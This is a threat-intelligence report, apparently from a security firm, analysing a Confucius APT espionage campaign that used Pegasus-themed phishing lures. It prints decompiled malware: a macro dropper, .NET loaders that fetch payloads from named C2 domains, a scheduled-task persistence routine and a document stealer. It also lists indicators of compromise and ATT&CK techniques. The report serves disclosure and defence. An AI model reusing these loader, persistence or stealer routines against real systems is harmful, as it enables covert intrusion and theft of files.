Confucius, an Indian state-sponsored APT group, continues to target Defense and Government organizations in South-Asia, especially Pakistan. The primary purpose of the TA appears to conduct espionage campaigns and steal information critical to the operations of the targeted institutes.
In August 2021, the release of Amnesty International’s advisory on Pegasus Spyware by Israel’s NSO Group was the source of major unrest in the country’s politicians and other elite individuals. Capitalizing on this unrest, Confucius began to lure such individuals by means of a bi-partite email wherein the first email was a simple informational mail against Pegasus and the second email contained an encrypted document (with the password of the document mentioned in the same email). Technical analysis of the document and the entire attack chain points towards a well-thought espionage campaign, a new for Confucius.
In late September 2021, the same campaign was re-run wherein the only changes we witnessed were the domains which were used for payload acquisition and data exfiltration. The flow of the whole attack chain can be seen below:
Reports of a potential intrusion by Confucius were first disclosed by researchers on Twitter. Analysis of the campaign by our researchers is discussed in detail in the following sections:
Confucius heavily relies on Microsoft Word documents to deliver spear-phishing emails to their targets. Previously, these Word documents had external relationships to malicious templates (for template injection). More recently, the group appears to have made a switch to using malicious VBA macros.
Using the Document_Open method, the macro executes two functions; one to write the binary to disk (eventually loading it) and the second to update the caption of an image embedded within the document. The function MyColor takes in the value of the Comments property of the active document, opens the handle to a file in the Temp directory, and writes the data (after converting it to binary) to disk.
Sub Mycolor()Dim prop As DocumentProperty For Each prop In ActiveDocument.BuiltInDocument
Properties If prop.Name = "Comments" Then s = prop.Value End If Nextfnum = FreeFileFName = Environ("TMP") & "\skfk.txt"Open FName For Binary As #fnum Put #fnum, , abc(CStr(s))Close #fnumfr = "'" & Environ("TMP") & "\skfk.txt" & "'"Result = "Powershell [Reflection.Assembly]::LoadFile(" & fr & ");$doo = New-Object Tysdf.Class1;$doo.sadkj()"CreateObje
ct("WScript.
Shell").Run Result, 0, TrueEnd Sub
Snippet 1: VBA Macros Embedded Inside Lure
Once written, the binary is loaded into memory using PowerShell’s implementation of the Reflection API (or more specifically, the LoadFile method in the class). The LoadFile method takes in one parameter which is the .NET assembly. Later, an object of Class1 is instantiated and the sadkj procedure is called.
Static analysis of the binary suggests that it is in fact a dynamic-link library (.NET assembly) with a modified ‘compile timestamp’ pointing to 2050. The function sadkj instantiates another object of the same class and attempts to call the function sdlfghjgks from it.
public void sadkj(){ string str = Path.GetTempPath() + "skfk.txt"; new Process { StartInfo = { FileName = "powershell.exe", Arguments = "[Reflection.Assembly]::LoadFile('" + str + "');$t = New-Object Tysdf.Class1;$t.sdlfghjgks()", WindowStyle = ProcessWindowStyle.Hidden } }.Start(); Environment.Exit(0);}
Snippet 2: .NET Loader
This function is interesting as it references a URL to acquire (what looks like another DLL masqueraded as a .TXT file) a file from the C2 infrastructure. To summarize the function, it downloads the .TXT file from the URL referencing the domain inshaaldom.xyz, loads the assembly by converting the ASCII payload to binary via the moon function, acquires the types from the assembly, instantiates them and dynamically invokes the ndmsbfl function from the recently acquired assembly.
public void sdlfghjgks(){ WebClient webClient = new WebClient(); string uriString = "https://inshaaldom.xyz/SowpnTdb.
txt"; try { string sweiorut = webClient.DownloadString(new Uri(uriString)); Type[] types = Assembly.Load(this.moon(sweiorut)
).GetTypes(); for (int i = 0; i < types.Length; i++) { object arg = Activator.CreateInstance(types[i]); if (Class1.<>o__3.<>p__0 == null) { Class1.<>o__3.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.
RuntimeBind
er.Binder.InvokeMember(CSharp
BinderFlags.
ResultDiscarded, "ndmsbfl", null, typeof(Class1), new CSharpArgumentInfo[] { CSharpArgumentInfo.Create(CShar
pArgument
InfoFlags.None, null) })); ...}
Snippet 3: Payload Acquisition and Dynamic Invocation of Scheduler
Static analysis of SowpnTdb.txt (DLL) led us to identify some interesting strings. The embedded PDB path F:\Hacking Notes - Documents\Projects\project-05\SowpnTdb\SowpnTdb\bin\Release\
ILMerge\So
wpnTdb.pdb (in one of the intrusions from the campaign) indicated several projects were in-line to continue the attack campaign. Several meta-data fields of the binary pointed towards it being a Task Scheduler, likely acquired from the GitHub. Recon on GitHub pointed towards a .NET wrapper for the Task Scheduler API exposed by Windows which was a direct match of the codebase used by the Scheduler. This highlights the fact that Confucius utilizes open-source projects in their operations. We’ve also previously identified similar patterns of using open-source tools (OSTs) from their (potential) sister-group, Sidewinder.
Analysis of the function ndmsbfl suggests it downloads another DLL (jksdfhk.txt) from the server (same domain as before) and drops it to C:\ProgramData. Following that, a task titled Systemcheck is scheduled to run a PowerShell command every five minutes. Scheduled commands are the previously covered dynamic invocation calls with the Reflection API being used to load the recently dropped DLL.
public void ndmsbfl(){ new WebClient().DownloadFile(new Uri("https://parinari.xyz/Msdjkfh.txt"), "C:\\ProgramData\\jksdfhk.txt"); new TaskService(); TimeTrigger trigger = new TimeTrigger { Repetition = new RepetitionPattern(TimeSpan.From
Minutes(5.0), TimeSpan.FromDays(0.0), false) }; string path = "C:\\Windows\\System32\\Windows
PowerShell\\
v1.0\\powershell.exe"; string arguments = "-windowstyle hidden -C $rk = \"\"\"C:\\ProgramData\\jksdfhk.txt\"\"\
[Reflection.Assembly]::LoadFile($rk);
$tt = New-Object Msdjkfh.Class1;$tt.Nasuyd()\" "; TaskService.Instance.AddTask("
Systemcheck", trigger, new ExecAction(path, arguments, null), null, null, TaskLogonType.InteractiveToken, null);}
Snippet 4: .NET Task Scheduler
The final .NET loader has similar operations to what we’ve witnessed in the previous loader binaries. Here’s a summary of the operations in this particular loader:
public void Nasuyd(){ WebClient webClient = new WebClient(); string uriString = "https://parinari.xyz/Rwlksdnasjd.txt"; try { string st = webClient.DownloadString(new Uri(uriString)); Type[] types = Assembly.Load(this.Houn(st)).GetTy
pes(); for (int i = 0; i < types.Length; i++) { object arg = Activator.CreateInstance(types[i]); if (Class1.<>o__1.<>p__0 == null) { Class1.<>o__1.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.
RuntimeBinder.Binder.InvokeMem
ber(CSharpBinder
Flags.ResultDiscarded, "sdsdjkfhds", null, typeof(Class1), new CSharpArgumentInfo[] { CSharpArgumentInfo.Create(CShar
pArgumentInfoFlags.None, null) })); } ...}
Snippet 4: Final .NET loader
Continuing the analysis with the last invoked function, sdsdjkfhds, the metadata of the DLL (Rwlksdnasjd.txt) and several network calls inside the DLL further strengthen the fact that it is in fact an uploader. A snippet of the function is listed below:
public void sdsdjkfhds(){ string userName = Environment.UserName; List<string> pfhl = new List<string>(); string pattern = "*"; pfhl = this.Gpufh(); "C:\\\\Users\\\\" + userName; string tdn = Environment.MachineName + "__" + userName; this.CUD(tdn, 0); foreach (string text in Directory.GetDirectories("C:\\Users\\")) { if (text != "C:\\Users\\Default" || text != "C:\\Users\\Public") { this.GF(text + "\\Documents\\", pattern, "Documents", pfhl); this.GF(text + "\\Downloads\\", pattern, "Downloads", pfhl); this.GF(text + "\\Desktop\\", pattern, "Desktop", pfhl); this.GF(text + "\\Pictures\\", pattern, "Pictures", pfhl); } } DriveInfo[] drives = DriveInfo.GetDrives(); char[] trimChars = new char[] { ':', '\\' }; foreach (DriveInfo driveInfo in drives) { if (driveInfo.Name != "C:\\") { this.GF(driveInfo.Name, pattern, driveInfo.Name.TrimEnd(trimChars), pfhl); } } Environment.Exit(0);}
Snippet 5: Stealer and Uploader
private void GF(string path, string pattern, string ufn, List<string> pfhl){ ... try { list.AddRange(Directory.GetFiles(
path, pattern, SearchOption.TopDirectoryOnly)); foreach (string text in list) { ... if (a == "txt" || a == "TXT" || a == "pdf" || a == "PDF" || a == "png" || a == "PNG" || a == "jpg" || a == "JPG" || a == "DOC" || a == "doc" || a == "XLS" || a == "xlm" || a == "XLM" || a == "xls" || a == "odp" || a == "ODP" || a == "ods" || a == "ODS" || a == "odt" || a == "ODT" || a == "rtf" || a == "RTF" || a == "ppt" || a == "PPT" || a2 == "xlsx" || a2 == "XLSX" || a2 == "xlsm" || a2 == "XLSM" || a2 == "docx" || a2 == "DOCX" || a2 == "pptx" || a2 == "PPTX" || a2 == "jpeg" || a2 == "JPEG") { list2.Add(text); } } ... foreach (string text3 in list2) { if (!(text3 == "")) { string item; using (MD5 md = MD5.Create()) { using (FileStream fileStream = File.OpenRead(text3)) { item = BitConverter.ToString(md.Compute
Hash(fileStream)).Replace("-", ""); } } if (!pfhl.Contains(item)) { list3.Add(text3); list4.Add(item); } } } } if (list3.Count != 0) { this.CUD(text2, 1); ... } ...}
Snippet 6: Capabilities of the Stealer
Although the payload acquisition domain does encrypt its communication with the compromised host (via HTTPS), the exfiltration domain, thakithaiya.xyz uses the plain-text HTTP protocol to send/receive data from the C2 server. Similar to the earlier campaigns carried out by Confucius, the web pages are written in PHP (with random URIs and parameter names to collect usernames/machine name). Since the task is scheduled for a five minute run, the uploader runs the same routine over and over, collecting files and folders from the system, until terminated.
Following Indicators of Compromise were discovered during the course of our intrusion analysis:
| File Name | Type | Hash |
|---|---|---|
| Ticket00073146.docm | MD5 SHA1 SHA256 | a91be9529d06cd4a6c06a01b5c595630 814367a04163802d5e124e599772c6a3b a681a78 034cfe57d26cfea4139cf7bb387b9ba8f 8705e44d3868e5edc36af0f7a8aa5bf |
| Tysdf.dll (skfk.txt) | MD5 SHA1 SHA256 | ae3e8679df2976d31da858fd7af67185 4c6c04af547b7df04e3bdb3f69e812a3 0b200016 ea7a951dbd93d5ef6ca535820499da29 753331e1e8a38c6fef9398a57a679ef0 |
| Msdjkfh.dll (jksdfhk.txt) | MD5 SHA1 SHA256 | 5397cbaf89ff40a8b08004ac5164c8a0 17f1e33763cb6e5ae6b39f3f28bc695ac5 97ce7b bf50438e10e8ed3eaa7949440a6ac4bd c55305aa2bfe75fa1997feaf0cbc9d50 |
| Rwlksdnasjd.dll (Stealer) | MD5 SHA1 SHA256 | 457101ea5c30c53f9381d7e9aa6432a4 e554c0ef069fe5a49919bea560003cfccd 69f858 43698d70087aa875c4384b59cacd8eff5 6bd0bff3be20e69b98613ec5184b41f |
| SowpnTdb.txt (Scheduler) | MD5 SHA1 SHA256 | 4461412acfc3988974355d4c1601d3f6 33596fbe26e556bb2610739f070b66a2c f532eda 63ca532a13ff909b4b7f72b9a094fa3fc5 9713984f645664c95a66f14be5f96a |
| File Path | Description |
|---|---|
| %Temp%\skfk.txt | .NET DLL dropped by the Word document; used to load the next stage into memory |
| C:\ProgramData\ jksdfhk.txt | .NET DLL dropped by SownpnTdb.dll; used to load the next stage into memory |
| Task Name | Task Occurence |
|---|---|
| Systemcheck | Every five minutes |
| Domain Name | Protocol | Usage | IPv4 Address |
|---|---|---|---|
| thakithaiya.xyz | HTTP | Exfiltration | 80.209.238.155 |
| pirnaram.xyz | HTTP | Exfiltration | 34.98.99.30,62.77.153.51 |
| inshaaldom.xyz | HTTPS | Payload Acquisition | 104.21.10.162,172.67.146.1 |
| C:\ProgramData\ jksdfhk.txt | HTTPS | Payload Acquisition | 34.98.99.30,104.21.86.125, 172.67.219.211 |
Yara rules to detect the Loader and Stealer used by Confucius in their recent cyber-espionage campaigns can be found at our GitHub repository.
Following tactics, techniques, and procedures are actively used by Confucius in their intrusions:
| Domain | ID | Name | Description |
|---|---|---|---|
| T1598 | Gather Victim Identity Information | Confucius extensively gathers the victim’s identifying information to target them via effective lures | |
| T1583 | Acquire Infrastructure | Confucius acquires new infrastructure (discussed in next techniques) a month before each new campaign | |
| T1583.001 | Acquire Infrastructure: Domains | Confucius typically registers two new domains as part of their infrastructure; one to acquire payloads from and another to ex-filtrate data to | |
| T1583.004 | Acquire Infrastructure: Server | Confucius acquires virtual private servers to acquire payloads from and ex-filtrate data to during the Command and Control phase | |
| T1566 | Phishing/Spearphishing Attachment | Confucius heavily relies on Spearphishing (attachments) to compromise their targets. Targeted emails in the past lured users into opening attachments (often encrypted; passwords being mentioned in the email’s content) by utilizing decoy documents including Payrolls, Pegasus (defenses against it), and others | |
| T1053.005 | Scheduled Task/Job: Scheduled Task | Confucius schedules a Task on the compromised system to re-execute the malicious payload (every five minutes) | |
| T1036 | Masquerading | Dynamic-link Libraries (.DLL) files used by Confucius to load the payload from subsequent stages was masquerading as .TXT (plain-text) files on the filesystem | |
| T1083 | File and Directory Discovery | The final-stage stealer deployed by Confucius extensively searches the filesystem for matches on particular file extensions and ex-filtrates the identified files to the C2 server | |
| T1082 | System Information Discovery | The final-stage stealer deployed by Confucius also collects information about the compromised system such as drives, machine name, and users for exfiltration and later downloading hash lists for comparisons | |
| T1059.001 | Command and Scripting Interpreter: PowerShell | Confucius heavily relies on the reflection API exposed by PowerShell to load/execute their DLLs in memory leaving minimal footprints on the compromised system’s disk | |
| T1005 | Data from Local System | Confucius collects data such as files and folders from the compromised system in an automated fashion to ex-filtrate to their server | |
| T1071.001 | Application Layer Protocol: Web Protocols | Confucius serves its command and control server using the web protocols, HTTP and HTTPS | |
| T1573.002 | Encrypted Channel: Asymmetric Cryptography | Confucius uses Asymmetric Cryptography to encrypt its communication over web protocols and communicate with the C2 server | |
| T1041 | Exfiltration over C2 Channel | Confucius ex-filtrates data collected from the compromised system to the C2 channel | |
| T1029 | Scheduled Transfer | Scheduled jobs also implement a schedule to transfer/ex-filtrate files from the compromised system and acquire a hash file to match hashes against and exclude files which have already been delivered to Confucius’ C2 server |
While performing reconnaissance against the infrastructure of Confucius, we found a deviation from their normal pattern of operations. Confucius highly utilizes C2 domains bought from the registrar, GoDaddy, using different US-based addresses to do so. However, the primary C2 domain in the recent campaign, inshaaldom.xyz, and the C2 domain used in the campaign in August 2021, parinari.xyz, were both registered from Chandigarh, India. We consider this to be an operational mistake from the operators behind Confucius revealing their origin.
Figure 2: C2 domain registered in India deviating from usual domain registration pattern of Confucius
The selection of techniques by Confucius are not very sophisticated at the moment along with some operational security failures however; analysis of the campaign highlighted the creativity of its operators and their potential to increase sophistication in the future.
Previous campaigns by Confucius utilized techniques like Template Injection in spear-phishing documents; However, the current campaign makes use of macros and an embedded PE in the comments of a picture inside the document. These minor changes in techniques suggest the group is actively looking to switch their tradecraft to avoid detections based on named rulesets.
GET IN TOUCH!
info@ebryx.com
+1 603-912-5385
389 Main Street, Unit 5
Salem, NH 03079
